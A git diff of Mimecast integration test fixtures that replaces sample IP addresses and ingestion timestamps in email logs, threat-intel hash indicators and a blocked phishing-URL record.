@@ -134,11 +134,11 @@ "established": false }, "source": { - "ip": "8.8.8.8" + "ip": "67.43.156.15" }, "event": { - "ingested": "2021-12-06T21:18:44.898247800Z", - "original": "{\"acc\":\"ABC123\",\"Delivered\":true,\"IP\":\"8.8.8.8\",\"AttCnt\":0,\"Dir\":\"Internal\",\"ReceiptAck\":\"250 SmtpInternalThread-19194240-1634623495703@uk-mta-151.uk.mimecast.lan Received OK [61dfe7da-4c6d-34e1-9667-69b04f0d564f.uk151]\",\"MsgId\":\"\u003c137188507-1634623494888@uk-mta-151.uk.mimecast.lan\u003e\",\"Subject\":null,\"Latency\":1090,\"Sender\":\"johndoe@example.com\",\"datetime\":\"2021-10-19T07:04:55+0100\",\"Rcpt\":\"johndoejr@example.com\",\"AttSize\":0,\"Attempt\":1,\"Snt\":51666,\"aCode\":\"61dfe7da-4c6d-34e1-9667-69b04f0d564f\",\"UseTls\":\"No\", \"Content-Disposition\":\"attachment; filename=\\\"delivery_20211018093329655.json\\\"\"},{\"acc\":\"ABC123\",\"Delivered\":false,\"IP\":\"8.8.8.8\",\"RejType\":\"Recipient email address is possibly incorrect\",\"RejCode\":\"550\",\"AttCnt\":0,\"Dir\":\"Internal\",\"ReceiptAck\":null,\"MsgId\":\"\u003c137188507-1634623494888@uk-mta-151.uk.mimecast.lan\u003e\",\"Subject\":\"You have new held messages\",\"Latency\":1534,\"Sender\":\"johndoe@example.com\",\"datetime\":\"2021-10-19T07:04:56+0100\",\"Rcpt\":\"johndoejr@example.com\",\"AttSize\":0,\"Attempt\":1,\"RejInfo\":\"5.4.1 Recipient address rejected: Access denied. 
AS(201806281) [CWLGBR01FT010.eop-gbr01.prod.protection.outlook.com]\",\"TlsVer\":\"TLSv1.2\",\"Cphr\":\"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384\",\"Snt\":147,\"aCode\":\"61dfe7da-4c6d-34e1-9667-69b04f0d564f\",\"UseTls\":\"Yes\",\"Route\":\"Office365\",\"Content-Disposition\":\"attachment; filename=\\\"delivery_20211018093329655.json\\\"\"}", + "ingested": "2021-12-09T15:16:05.665560600Z", + "original": "{\"acc\":\"ABC123\",\"Delivered\":true,\"IP\":\"67.43.156.15\",\"AttCnt\":0,\"Dir\":\"Internal\",\"ReceiptAck\":\"250 SmtpInternalThread-19194240-1634623495703@uk-mta-151.uk.mimecast.lan Received OK [61dfe7da-4c6d-34e1-9667-69b04f0d564f.uk151]\",\"MsgId\":\"\u003c137188507-1634623494888@uk-mta-151.uk.mimecast.lan\u003e\",\"Subject\":null,\"Latency\":1090,\"Sender\":\"johndoe@example.com\",\"datetime\":\"2021-10-19T07:04:55+0100\",\"Rcpt\":\"johndoejr@example.com\",\"AttSize\":0,\"Attempt\":1,\"Snt\":51666,\"aCode\":\"61dfe7da-4c6d-34e1-9667-69b04f0d564f\",\"UseTls\":\"No\", \"Content-Disposition\":\"attachment; filename=\\\"delivery_20211018093329655.json\\\"\"},{\"acc\":\"ABC123\",\"Delivered\":false,\"IP\":\"67.43.156.15\",\"RejType\":\"Recipient email address is possibly incorrect\",\"RejCode\":\"550\",\"AttCnt\":0,\"Dir\":\"Internal\",\"ReceiptAck\":null,\"MsgId\":\"\u003c137188507-1634623494888@uk-mta-151.uk.mimecast.lan\u003e\",\"Subject\":\"You have new held messages\",\"Latency\":1534,\"Sender\":\"johndoe@example.com\",\"datetime\":\"2021-10-19T07:04:56+0100\",\"Rcpt\":\"johndoejr@example.com\",\"AttSize\":0,\"Attempt\":1,\"RejInfo\":\"5.4.1 Recipient address rejected: Access denied. 
AS(201806281) [CWLGBR01FT010.eop-gbr01.prod.protection.outlook.com]\",\"TlsVer\":\"TLSv1.2\",\"Cphr\":\"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384\",\"Snt\":147,\"aCode\":\"61dfe7da-4c6d-34e1-9667-69b04f0d564f\",\"UseTls\":\"Yes\",\"Route\":\"Office365\",\"Content-Disposition\":\"attachment; filename=\\\"delivery_20211018093329655.json\\\"\"}", "created": "2021-10-19T07:04:55+0100", "outcome": "success" }, @@ -177,7 +177,7 @@ "version": "1.12.0" }, "event": { - "ingested": "2021-12-06T21:18:44.898248900Z", + "ingested": "2021-12-09T15:16:05.665567200Z", "original": "{\"acc\":\"C46A75\",\"Sender\":\"johndoe@example.com\",\"datetime\":\"2021-11-08T12:09:18+0000\",\"Rcpt\":\"o365_service_account@example.com\",\"RcptActType\":\"Jnl\",\"aCode\":\"CYSuuaBUMjOpk3k1Xhvy_Q\",\"Dir\":\"Internal\",\"RcptHdrType\":\"Unknown\", \"Content-Disposition\":\"attachment; filename=\\\"jrnl_20211018093329655.json\\\"\"}", "created": "2021-11-08T12:09:18+0000", "outcome": "unknown" 
@@ -208,12 +208,12 @@ "version": "1.12.0" }, "source": { - "ip": "8.8.8.8" + "ip": "81.2.69.193" }, "event": { "action": "Acc", - "ingested": "2021-12-06T21:18:44.898250100Z", - "original": "{\"acc\":\"C46A75\",\"Sender\":\"johndoe@example.com\",\"datetime\":\"2021-11-08T12:10:19+0000\",\"Rcpt\":\"johndoejr@example.com\",\"Act\":\"Acc\",\"IP\":\"8.8.8.8\",\"aCode\":\"3dbe9918-f91f-3043-b61f-d3164badfe50\",\"Dir\":\"Internal\",\"Subject\":\"You have new held messages\",\"MsgId\":\"\u003c140943948-1636373419265@uk-mta-286.uk.mimecast.lan\u003e\",\"headerFrom\":\"johndoe@example.com\", \"Content-Disposition\":\"attachment; filename=\\\"receipt_20211018093329655.json\\\"\"}", + "ingested": "2021-12-09T15:16:05.665573200Z", + "original": "{\"acc\":\"C46A75\",\"Sender\":\"johndoe@example.com\",\"datetime\":\"2021-11-08T12:10:19+0000\",\"Rcpt\":\"johndoejr@example.com\",\"Act\":\"Acc\",\"IP\":\"81.2.69.193\",\"aCode\":\"3dbe9918-f91f-3043-b61f-d3164badfe50\",\"Dir\":\"Internal\",\"Subject\":\"You have new held messages\",\"MsgId\":\"\u003c140943948-1636373419265@uk-mta-286.uk.mimecast.lan\u003e\",\"headerFrom\":\"johndoe@example.com\", \"Content-Disposition\":\"attachment; filename=\\\"receipt_20211018093329655.json\\\"\"}", "created": "2021-11-08T12:10:19+0000", "outcome": "unknown" }, 
@@ -245,13 +245,13 @@ }, "source": { "domain": "zenz.us", - "ip": "52.100.141.34" + "ip": "81.2.69.193" }, "event": { "reason": "malicious", "action": "Block", - "ingested": "2021-12-06T21:18:44.898251200Z", - "original": "{\"acc\":\"C46A75\",\"reason\":\"malicious\",\"subject\":\"DocuSign- Contract #45576744333\",\"msgid\":null,\"url\":\"http:\\/\\/docusign.swrodgods.x10.mx\\/Docun\\/Docu\\/index2.php\",\"datetime\":\"2021-11-29T15:13:58+0000\",\"route\":\"inbound\",\"sourceIp\":\"52.100.141.34\",\"sender\":\"docusign-services@zenz.us\",\"recipient\":\"aorchard@twotoeight.com\",\"action\":\"Block\",\"urlCategory\":\"Phishing \u0026 Fraud\",\"credentialTheft\":null,\"senderDomain\":\"zenz.us\", \"Content-Disposition\":\"attachment; filename=\\\"ttp_url_20211129153015541.json\\\"\"}", + "ingested": "2021-12-09T15:16:05.665578600Z", + "original": "{\"acc\":\"C46A75\",\"reason\":\"malicious\",\"subject\":\"DocuSign- Contract #45576744333\",\"msgid\":null,\"url\":\"http:\\/\\/docusign.swrodgods.x10.mx\\/Docun\\/Docu\\/index2.php\",\"datetime\":\"2021-11-29T15:13:58+0000\",\"route\":\"inbound\",\"sourceIp\":\"81.2.69.193\",\"sender\":\"docusign-services@zenz.us\",\"recipient\":\"aorchard@twotoeight.com\",\"action\":\"Block\",\"urlCategory\":\"Phishing \u0026 Fraud\",\"credentialTheft\":null,\"senderDomain\":\"zenz.us\", \"Content-Disposition\":\"attachment; filename=\\\"ttp_url_20211129153015541.json\\\"\"}", "created": "2021-11-29T15:13:58+0000", "outcome": "unknown" }, diff --git a/packages/mimecast/data_stream/threat_intel_malware_customer/_dev/test/pipeline/test-threat-intel-malware-customer.log-expected.json b/packages/mimecast/data_stream/threat_intel_malware_customer/_dev/test/pipeline/test-threat-intel-malware-customer.log-expected.json index eff4f98cf01..a878745fd1f 100644 --- a/packages/mimecast/data_stream/threat_intel_malware_customer/_dev/test/pipeline/test-threat-intel-malware-customer.log-expected.json 
+++ b/packages/mimecast/data_stream/threat_intel_malware_customer/_dev/test/pipeline/test-threat-intel-malware-customer.log-expected.json @@ -24,7 +24,7 @@ } }, "event": { - "ingested": "2021-11-25T11:34:12.218116Z", + "ingested": "2021-12-09T15:16:06.051075700Z", "original": "{ \"Content-Disposition\":\"attachment; filename=\\\"malware_customer_stix_20211028161801144.stix\\\"\",\"type\": \"indicator\", \"id\": \"indicator--18c62174-0d31-4653-afe6-d104c57b6b2c\", \"created\": \"2021-10-29T15:07:26.653Z\", \"modified\": \"2021-10-29T15:07:26.653Z\", \"labels\": [ \"malicious-activity\" ], \"pattern\": \"[file:hashes.'SHA-256' = 'c20d551424f2df6312f7fa700ed97cd199c3d5c8a0f4dfd683627f18913096de']\", \"valid_from\": \"2021-10-29T15:07:26.653Z\" }", "category": "threat", "type": "indicator", @@ -69,7 +69,7 @@ } }, "event": { - "ingested": "2021-11-25T11:34:12.218119200Z", + "ingested": "2021-12-09T15:16:06.051095300Z", "original": "{ \"Content-Disposition\":\"attachment; filename=\\\"malware_customer_stix_20211028161801144.stix\\\"\",\"type\": \"indicator\", \"id\": \"indicator--d70d0fc0-7fbe-4acc-9830-230a97ecdab3\", \"created\": \"2021-10-29T15:07:22.595Z\", \"modified\": \"2021-10-29T15:07:22.595Z\", \"labels\": [ \"malicious-activity\" ], \"pattern\": \"[file:hashes.'SHA-256' = '6a6cd489550ddc08871e14dec73f782bf2405378e9f4adeaa61f1574bea4dbbb']\", \"valid_from\": \"2021-10-29T15:07:22.595Z\" }", "category": "threat", "type": "indicator", 
@@ -114,7 +114,7 @@ } }, "event": { - "ingested": "2021-11-25T11:34:12.218122100Z", + "ingested": "2021-12-09T15:16:06.051110900Z", "original": "{ \"Content-Disposition\":\"attachment; filename=\\\"malware_customer_stix_20211028161801144.stix\\\"\",\"type\": \"indicator\", \"id\": \"indicator--571f0b0a-7206-4a1f-9c5d-9c04e46e0976\", \"created\": \"2021-10-29T15:07:17.538Z\", \"modified\": \"2021-10-29T15:07:17.538Z\", \"labels\": [ \"malicious-activity\" ], \"pattern\": \"[file:hashes.'SHA-256' = '8042d56337b7e7be79688ca861b3c4ba928f95b0824f598ca79e63882dea0668']\", \"valid_from\": \"2021-10-29T15:07:17.538Z\" }", "category": "threat", "type": "indicator", @@ -159,7 +159,7 @@ } }, "event": { - "ingested": "2021-11-25T11:34:12.218124900Z", + "ingested": "2021-12-09T15:16:06.051126200Z", "original": "{ \"Content-Disposition\":\"attachment; filename=\\\"malware_customer_stix_20211028161801144.stix\\\"\",\"type\": \"indicator\", \"id\": \"indicator--90b29bf9-ea1a-423b-8542-4c4590f4038c\", \"created\": \"2021-10-29T15:07:14.044Z\", \"modified\": \"2021-10-29T15:07:14.044Z\", \"labels\": [ \"malicious-activity\" ], \"pattern\": \"[file:hashes.'SHA-256' = 'df086e1fe742f0992ecd2aec8a3a4b5be6023cca5ef8caf1da3d5b67e9359047']\", \"valid_from\": \"2021-10-29T15:07:14.044Z\" }", "category": "threat", "type": "indicator", @@ -204,7 +204,7 @@ } }, "event": { - "ingested": "2021-11-25T11:34:12.218128Z", + "ingested": "2021-12-09T15:16:06.051142400Z", "original": "{ \"Content-Disposition\":\"attachment; filename=\\\"malware_customer_stix_20211028161801144.stix\\\"\",\"type\": \"indicator\", \"id\": \"indicator--a84c0ac6-f99e-4d1e-b552-74e9023d1505\", \"created\": \"2021-10-29T15:07:07.295Z\", \"modified\": \"2021-10-29T15:07:07.295Z\", \"labels\": [ \"malicious-activity\" ], \"pattern\": \"[file:hashes.'SHA-256' = '5dbdcba2a373949359459e0e94954896bc06565d745dd36ee2b013dee1dcc283']\", \"valid_from\": \"2021-10-29T15:07:07.295Z\" }", "category": "threat", "type": "indicator", 
@@ -249,7 +249,7 @@ } }, "event": { - "ingested": "2021-11-25T11:34:12.218130900Z", + "ingested": "2021-12-09T15:16:06.051158200Z", "original": "{ \"Content-Disposition\":\"attachment; filename=\\\"malware_customer_stix_20211028161801144.stix\\\"\",\"type\": \"indicator\", \"id\": \"indicator--1fe76455-3ec3-4319-a34c-e4e8e8236ec0\", \"created\": \"2021-10-29T15:07:00.555Z\", \"modified\": \"2021-10-29T15:07:00.555Z\", \"labels\": [ \"malicious-activity\" ], \"pattern\": \"[file:hashes.'SHA-256' = 'bcb910f6ab3144c97ca15845741c94479a8925f545ddf59e74253f50d862d10c']\", \"valid_from\": \"2021-10-29T15:07:00.555Z\" }", "category": "threat", "type": "indicator", @@ -294,7 +294,7 @@ } }, "event": { - "ingested": "2021-11-25T11:34:12.218133800Z", + "ingested": "2021-12-09T15:16:06.051176100Z", "original": "{ \"Content-Disposition\":\"attachment; filename=\\\"malware_customer_stix_20211028161801144.stix\\\"\",\"type\": \"indicator\", \"id\": \"indicator--3816deef-ba8f-40c4-ba11-a862b4322b11\", \"created\": \"2021-10-29T15:07:00.259Z\", \"modified\": \"2021-10-29T15:07:00.259Z\", \"labels\": [ \"malicious-activity\" ], \"pattern\": \"[file:hashes.'SHA-256' = 'e87c5de5f07b36806521334cd25e756b66aa8376d2d52faf269b1878c62cf3dd']\", \"valid_from\": \"2021-10-29T15:07:00.259Z\" }", "category": "threat", "type": "indicator", diff --git a/packages/mimecast/data_stream/threat_intel_malware_grid/_dev/test/pipeline/test-threat-intel-malware-grid.log-expected.json b/packages/mimecast/data_stream/threat_intel_malware_grid/_dev/test/pipeline/test-threat-intel-malware-grid.log-expected.json index 4197cdfe2b7..7123ee94e96 100644 --- a/packages/mimecast/data_stream/threat_intel_malware_grid/_dev/test/pipeline/test-threat-intel-malware-grid.log-expected.json +++ b/packages/mimecast/data_stream/threat_intel_malware_grid/_dev/test/pipeline/test-threat-intel-malware-grid.log-expected.json 
@@ -24,7 +24,7 @@ } }, "event": { - "ingested": "2021-11-25T11:34:13.427883400Z", + "ingested": "2021-12-09T15:16:06.632077Z", "original": "{ \"Content-Disposition\":\"attachment; filename=\\\"malware_grid_stix_20211028161801144.stix\\\"\",\"type\": \"indicator\", \"id\": \"indicator--18c62174-0d31-4653-afe6-d104c57b6b2c\", \"created\": \"2021-10-29T15:07:26.653Z\", \"modified\": \"2021-10-29T15:07:26.653Z\", \"labels\": [ \"malicious-activity\" ], \"pattern\": \"[file:hashes.'SHA-256' = 'c20d551424f2df6312f7fa700ed97cd199c3d5c8a0f4dfd683627f18913096de']\", \"valid_from\": \"2021-10-29T15:07:26.653Z\" }", "category": "threat", "type": "indicator", @@ -69,7 +69,7 @@ } }, "event": { - "ingested": "2021-11-25T11:34:13.427886400Z", + "ingested": "2021-12-09T15:16:06.632093200Z", "original": "{ \"Content-Disposition\":\"attachment; filename=\\\"malware_grid_stix_20211028161801144.stix\\\"\",\"type\": \"indicator\", \"id\": \"indicator--d70d0fc0-7fbe-4acc-9830-230a97ecdab3\", \"created\": \"2021-10-29T15:07:22.595Z\", \"modified\": \"2021-10-29T15:07:22.595Z\", \"labels\": [ \"malicious-activity\" ], \"pattern\": \"[file:hashes.'SHA-256' = '6a6cd489550ddc08871e14dec73f782bf2405378e9f4adeaa61f1574bea4dbbb']\", \"valid_from\": \"2021-10-29T15:07:22.595Z\" }", "category": "threat", "type": "indicator", @@ -114,7 +114,7 @@ } }, "event": { - "ingested": "2021-11-25T11:34:13.427889200Z", + "ingested": "2021-12-09T15:16:06.632108200Z", "original": "{ \"Content-Disposition\":\"attachment; filename=\\\"malware_grid_stix_20211028161801144.stix\\\"\",\"type\": \"indicator\", \"id\": \"indicator--571f0b0a-7206-4a1f-9c5d-9c04e46e0976\", \"created\": \"2021-10-29T15:07:17.538Z\", \"modified\": \"2021-10-29T15:07:17.538Z\", \"labels\": [ \"malicious-activity\" ], \"pattern\": \"[file:hashes.'SHA-256' = '8042d56337b7e7be79688ca861b3c4ba928f95b0824f598ca79e63882dea0668']\", \"valid_from\": \"2021-10-29T15:07:17.538Z\" }", "category": "threat", "type": "indicator", 
@@ -159,7 +159,7 @@ } }, "event": { - "ingested": "2021-11-25T11:34:13.427892100Z", + "ingested": "2021-12-09T15:16:06.632122500Z", "original": "{ \"Content-Disposition\":\"attachment; filename=\\\"malware_grid_stix_20211028161801144.stix\\\"\",\"type\": \"indicator\", \"id\": \"indicator--90b29bf9-ea1a-423b-8542-4c4590f4038c\", \"created\": \"2021-10-29T15:07:14.044Z\", \"modified\": \"2021-10-29T15:07:14.044Z\", \"labels\": [ \"malicious-activity\" ], \"pattern\": \"[file:hashes.'SHA-256' = 'df086e1fe742f0992ecd2aec8a3a4b5be6023cca5ef8caf1da3d5b67e9359047']\", \"valid_from\": \"2021-10-29T15:07:14.044Z\" }", "category": "threat", "type": "indicator", @@ -204,7 +204,7 @@ } }, "event": { - "ingested": "2021-11-25T11:34:13.427895300Z", + "ingested": "2021-12-09T15:16:06.632141Z", "original": "{ \"Content-Disposition\":\"attachment; filename=\\\"malware_grid_stix_20211028161801144.stix\\\"\",\"type\": \"indicator\", \"id\": \"indicator--a84c0ac6-f99e-4d1e-b552-74e9023d1505\", \"created\": \"2021-10-29T15:07:07.295Z\", \"modified\": \"2021-10-29T15:07:07.295Z\", \"labels\": [ \"malicious-activity\" ], \"pattern\": \"[file:hashes.'SHA-256' = '5dbdcba2a373949359459e0e94954896bc06565d745dd36ee2b013dee1dcc283']\", \"valid_from\": \"2021-10-29T15:07:07.295Z\" }", "category": "threat", "type": "indicator", @@ -249,7 +249,7 @@ } }, "event": { - "ingested": "2021-11-25T11:34:13.427898300Z", + "ingested": "2021-12-09T15:16:06.632158800Z", "original": "{ \"Content-Disposition\":\"attachment; filename=\\\"malware_grid_stix_20211028161801144.stix\\\"\",\"type\": \"indicator\", \"id\": \"indicator--1fe76455-3ec3-4319-a34c-e4e8e8236ec0\", \"created\": \"2021-10-29T15:07:00.555Z\", \"modified\": \"2021-10-29T15:07:00.555Z\", \"labels\": [ \"malicious-activity\" ], \"pattern\": \"[file:hashes.'SHA-256' = 'bcb910f6ab3144c97ca15845741c94479a8925f545ddf59e74253f50d862d10c']\", \"valid_from\": \"2021-10-29T15:07:00.555Z\" }", "category": "threat", "type": "indicator", 
@@ -294,7 +294,7 @@ } }, "event": { - "ingested": "2021-11-25T11:34:13.427901100Z", + "ingested": "2021-12-09T15:16:06.632176600Z", "original": "{ \"Content-Disposition\":\"attachment; filename=\\\"malware_grid_stix_20211028161801144.stix\\\"\",\"type\": \"indicator\", \"id\": \"indicator--3816deef-ba8f-40c4-ba11-a862b4322b11\", \"created\": \"2021-10-29T15:07:00.259Z\", \"modified\": \"2021-10-29T15:07:00.259Z\", \"labels\": [ \"malicious-activity\" ], \"pattern\": \"[file:hashes.'SHA-256' = 'e87c5de5f07b36806521334cd25e756b66aa8376d2d52faf269b1878c62cf3dd']\", \"valid_from\": \"2021-10-29T15:07:00.259Z\" }", "category": "threat", "type": "indicator", diff --git a/packages/mimecast/data_stream/ttp_ap_logs/_dev/test/pipeline/test-ttp-ap-logs.log-expected.json b/packages/mimecast/data_stream/ttp_ap_logs/_dev/test/pipeline/test-ttp-ap-logs.log-expected.json index fb94b0a115a..23150b6a377 100644 --- a/packages/mimecast/data_stream/ttp_ap_logs/_dev/test/pipeline/test-ttp-ap-logs.log-expected.json +++ b/packages/mimecast/data_stream/ttp_ap_logs/_dev/test/pipeline/test-ttp-ap-logs.log-expected.json @@ -15,7 +15,7 @@ }, "event": { "action": "user_release_none", - "ingested": "2021-11-25T11:34:14.425308900Z", + "ingested": "2021-12-09T15:16:07.254286800Z", "original": "{\"senderAddress\":\"\u003c\u003e\",\"recipientAddress\":\"johndoe@example.com\",\"fileName\":\"numbers.pdf\",\"fileType\":\"application\\/pdf\",\"result\":\"safe\",\"actionTriggered\":\"user release, none\",\"date\":\"2021-10-14T18:54:32+0000\",\"details\":\"Safe \\r\\nTime taken: 0 hrs, 0 min, 4 sec\",\"route\":\"inbound\",\"messageId\":\"\u003c20200806044148.F35F813B435@mail.brianjthronton.com\u003e\",\"subject\":\"Important Updated Numbers from the Center for Disease Control\",\"fileHash\":\"eaeef09b60a59b913e9bfc0a4373e25d6182beff388957473fba517cc09345e3\",\"definition\":\"Inbound - Safe file with On-Demand Sandbox\"}", "created": "2021-10-14T18:54:32+0000" }, 
@@ -61,7 +61,7 @@ }, "event": { "action": "user_release_none", - "ingested": "2021-11-25T11:34:14.425311400Z", + "ingested": "2021-12-09T15:16:07.254295600Z", "original": "{\"senderAddress\":\"\u003c\u003e\",\"recipientAddress\":\"johndoe@example.com\",\"fileName\":\"Titus-Test Doc - Classification - InternalUseOnly.docx\",\"fileType\":\"application\\/vnd.openxmlformats-officedocument.wordprocessingml.document\",\"result\":\"safe\",\"actionTriggered\":\"user release, none\",\"date\":\"2021-10-14T11:24:23+0000\",\"details\":\"Safe \\r\\nTime taken: 0 hrs, 0 min, 5 sec\",\"route\":\"inbound\",\"messageId\":\"\u003cDB8P194MB0824EE4C8D360CCE3DEB0243A1B89@DB8P194MB0824.EURP194.PROD.OUTLOOK.COM\u003e\",\"subject\":\"FW: Titus classification work\",\"fileHash\":\"2fb26be55ac710e4d9f80677ba24ae212dbb36bd934a0569fe521839e9f5d16e\",\"definition\":\"Inbound - Safe file with On-Demand Sandbox\"}", "created": "2021-10-14T11:24:23+0000" }, @@ -107,7 +107,7 @@ }, "event": { "action": "user_release_none", - "ingested": "2021-11-25T11:34:14.425312500Z", + "ingested": "2021-12-09T15:16:07.254301700Z", "original": "{\"senderAddress\":\"\u003c\u003e\",\"recipientAddress\":\"johndoe@example.com\",\"fileName\":\"Titus classification v0.3.pptx\",\"fileType\":\"application\\/vnd.openxmlformats-officedocument.presentationml\",\"result\":\"safe\",\"actionTriggered\":\"user release, none\",\"date\":\"2021-10-14T11:24:23+0000\",\"details\":\"Safe \\r\\nTime taken: 0 hrs, 0 min, 5 sec\",\"route\":\"inbound\",\"messageId\":\"\u003cDB8P194MB0824EE4C8D360CCE3DEB0243A1B89@DB8P194MB0824.EURP194.PROD.OUTLOOK.COM\u003e\",\"subject\":\"FW: Titus classification work\",\"fileHash\":\"111b86e1244ce6389efb60cddc001d594d334c540e85f9976be467a4ce472973\",\"definition\":\"Inbound - Safe file with On-Demand Sandbox\"}", "created": "2021-10-14T11:24:23+0000" }, 
diff --git a/packages/mimecast/data_stream/ttp_ip_logs/_dev/test/pipeline/test-ttp-ip-logs.log b/packages/mimecast/data_stream/ttp_ip_logs/_dev/test/pipeline/test-ttp-ip-logs.log
index 293dfe60f67..c38568b874f 100644
--- a/packages/mimecast/data_stream/ttp_ip_logs/_dev/test/pipeline/test-ttp-ip-logs.log
+++ b/packages/mimecast/data_stream/ttp_ip_logs/_dev/test/pipeline/test-ttp-ip-logs.log
@@ -1,3 +1,3 @@
-{"id":"MTOKEN:eNqrVkouLS7Jz00tSs5PSVWyUnI2MXM0N1XSUcpMUbIyMjU1NjIw1FEqSy0qzszPU7ICskvywAoNDAyVagFirRIG","senderAddress":"smtp@example.com","recipientAddress":"johndoe@example.com","subject":"Requested File","definition":"IP - 1 hit (Tag email)","hits":1,"identifiers":["internal_user_name"],"action":"none","taggedExternal":false,"taggedMalicious":true,"senderIpAddress":"8.8.8.8","eventTime":"2021-10-15T17:10:46+0000","impersonationResults":[{"impersonationDomainSource":"internal_user_name","similarDomain":"John Doe Jr ","stringSimilarToDomain":"John Doe Jr","checkerResult":"hit"}],"messageId":""}
-{"id":"MTOKEN:eNqrVkouLS7Jz00tSs5PSVWyUnI2MXM0N1XSUcpMUbIyMjUzszAx0VEqSy0qzszPU7Iy1FEqyQMrNDAwVaoFAGShEhs","senderAddress":"johndoe@gmail.com","recipientAddress":"johndoe@example.com","subject":"Fwd: Here ya go","definition":"IP - 1 hit (Tag email)","hits":1,"identifiers":["internal_user_name"],"action":"none","taggedExternal":false,"taggedMalicious":true,"senderIpAddress":"8.8.8.8","eventTime":"2021-10-15T06:16:34+0000","impersonationResults":[{"impersonationDomainSource":"internal_user_name","similarDomain":"John Doe ","stringSimilarToDomain":"John Doe","checkerResult":"hit"}],"messageId":""}
-{"id":"MTOKEN:eNqrVkouLS7Jz00tSs5PSVWyUnI2MXM0N1XSUcpMUbIyMjUzMDMz01EqSy0qzszPU7Iy1FEqyQMrNDAwVaoFAGQhEhc","senderAddress":"johndoe@mimecast.com","recipientAddress":"johndoe@example.com","subject":"RE: MSP Sales of Managed E2E","definition":"IP - 2 hits (Hold for Review \/ User Hold)","hits":2,"identifiers":["targeted_threat_dictionary","internal_user_name"],"action":"hold","taggedExternal":false,"taggedMalicious":true,"senderIpAddress":"8.8.8.8","eventTime":"2021-10-13T16:12:07+0000","impersonationResults":[{"impersonationDomainSource":"internal_user_name","similarDomain":"Emily Doe ","stringSimilarToDomain":"Emily Doe","checkerResult":"hit"},{"impersonationDomainSource":"targeted_threat_dictionary","stringSimilarToDomain":"who"}],"messageId":""}
\ No newline at
end of file
+{"id":"MTOKEN:eNqrVkouLS7Jz00tSs5PSVWyUnI2MXM0N1XSUcpMUbIyMjU1NjIw1FEqSy0qzszPU7ICskvywAoNDAyVagFirRIG","senderAddress":"smtp@example.com","recipientAddress":"johndoe@example.com","subject":"Requested File","definition":"IP - 1 hit (Tag email)","hits":1,"identifiers":["internal_user_name"],"action":"none","taggedExternal":false,"taggedMalicious":true,"senderIpAddress":"67.43.156.15","eventTime":"2021-10-15T17:10:46+0000","impersonationResults":[{"impersonationDomainSource":"internal_user_name","similarDomain":"John Doe Jr ","stringSimilarToDomain":"John Doe Jr","checkerResult":"hit"}],"messageId":""}
+{"id":"MTOKEN:eNqrVkouLS7Jz00tSs5PSVWyUnI2MXM0N1XSUcpMUbIyMjUzszAx0VEqSy0qzszPU7Iy1FEqyQMrNDAwVaoFAGShEhs","senderAddress":"johndoe@gmail.com","recipientAddress":"johndoe@example.com","subject":"Fwd: Here ya go","definition":"IP - 1 hit (Tag email)","hits":1,"identifiers":["internal_user_name"],"action":"none","taggedExternal":false,"taggedMalicious":true,"senderIpAddress":"67.43.156.15","eventTime":"2021-10-15T06:16:34+0000","impersonationResults":[{"impersonationDomainSource":"internal_user_name","similarDomain":"John Doe ","stringSimilarToDomain":"John Doe","checkerResult":"hit"}],"messageId":""}
+{"id":"MTOKEN:eNqrVkouLS7Jz00tSs5PSVWyUnI2MXM0N1XSUcpMUbIyMjUzMDMz01EqSy0qzszPU7Iy1FEqyQMrNDAwVaoFAGQhEhc","senderAddress":"johndoe@mimecast.com","recipientAddress":"johndoe@example.com","subject":"RE: MSP Sales of Managed E2E","definition":"IP - 2 hits (Hold for Review \/ User Hold)","hits":2,"identifiers":["targeted_threat_dictionary","internal_user_name"],"action":"hold","taggedExternal":false,"taggedMalicious":true,"senderIpAddress":"67.43.156.15","eventTime":"2021-10-13T16:12:07+0000","impersonationResults":[{"impersonationDomainSource":"internal_user_name","similarDomain":"Emily Doe ","stringSimilarToDomain":"Emily Doe","checkerResult":"hit"},{"impersonationDomainSource":"targeted_threat_dictionary","stringSimilarToDomain":"who"}],"messageId":""}
\ No
newline at end of file
diff --git a/packages/mimecast/data_stream/ttp_ip_logs/_dev/test/pipeline/test-ttp-ip-logs.log-expected.json b/packages/mimecast/data_stream/ttp_ip_logs/_dev/test/pipeline/test-ttp-ip-logs.log-expected.json
index 9358a91a0f2..d6fab92838c 100644
--- a/packages/mimecast/data_stream/ttp_ip_logs/_dev/test/pipeline/test-ttp-ip-logs.log-expected.json
+++ b/packages/mimecast/data_stream/ttp_ip_logs/_dev/test/pipeline/test-ttp-ip-logs.log-expected.json
@@ -7,19 +7,19 @@ }, "related": { "ip": [ - "8.8.8.8" + "67.43.156.15" ] }, "rule": { "name": "IP - 1 hit (Tag email)" }, "source": { - "ip": "8.8.8.8" + "ip": "67.43.156.15" }, "event": { "action": "none", - "ingested": "2021-11-25T11:34:15.002442200Z", - "original": "{\"id\":\"MTOKEN:eNqrVkouLS7Jz00tSs5PSVWyUnI2MXM0N1XSUcpMUbIyMjU1NjIw1FEqSy0qzszPU7ICskvywAoNDAyVagFirRIG\",\"senderAddress\":\"smtp@example.com\",\"recipientAddress\":\"johndoe@example.com\",\"subject\":\"Requested File\",\"definition\":\"IP - 1 hit (Tag email)\",\"hits\":1,\"identifiers\":[\"internal_user_name\"],\"action\":\"none\",\"taggedExternal\":false,\"taggedMalicious\":true,\"senderIpAddress\":\"8.8.8.8\",\"eventTime\":\"2021-10-15T17:10:46+0000\",\"impersonationResults\":[{\"impersonationDomainSource\":\"internal_user_name\",\"similarDomain\":\"John Doe Jr \u003cjohndoejr@example.com\u003e\",\"stringSimilarToDomain\":\"John Doe Jr\",\"checkerResult\":\"hit\"}],\"messageId\":\"\u003cEE7E97EA-1926-4A90-9399-D049A98893F4@emailsec.ninja\u003e\"}", + "ingested": "2021-12-09T15:16:07.465640200Z", + "original": "{\"id\":\"MTOKEN:eNqrVkouLS7Jz00tSs5PSVWyUnI2MXM0N1XSUcpMUbIyMjU1NjIw1FEqSy0qzszPU7ICskvywAoNDAyVagFirRIG\",\"senderAddress\":\"smtp@example.com\",\"recipientAddress\":\"johndoe@example.com\",\"subject\":\"Requested File\",\"definition\":\"IP - 1 hit (Tag email)\",\"hits\":1,\"identifiers\":[\"internal_user_name\"],\"action\":\"none\",\"taggedExternal\":false,\"taggedMalicious\":true,\"senderIpAddress\":\"67.43.156.15\",\"eventTime\":\"2021-10-15T17:10:46+0000\",\"impersonationResults\":[{\"impersonationDomainSource\":\"internal_user_name\",\"similarDomain\":\"John Doe Jr 